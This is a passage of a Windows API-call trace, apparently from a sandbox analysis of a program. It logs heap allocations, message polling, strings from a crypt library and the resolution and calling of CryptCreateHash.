cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0234.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0234.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.404] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0234.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.405] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0234.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0234.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.405] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0234.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.406] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0234.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.406] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0234.406] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0234.406] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.407] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.407] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.407] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.407] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.407] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0234.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.407] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0234.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51370, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.408] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0234.408] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0234.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0234.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0234.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0234.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0234.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: 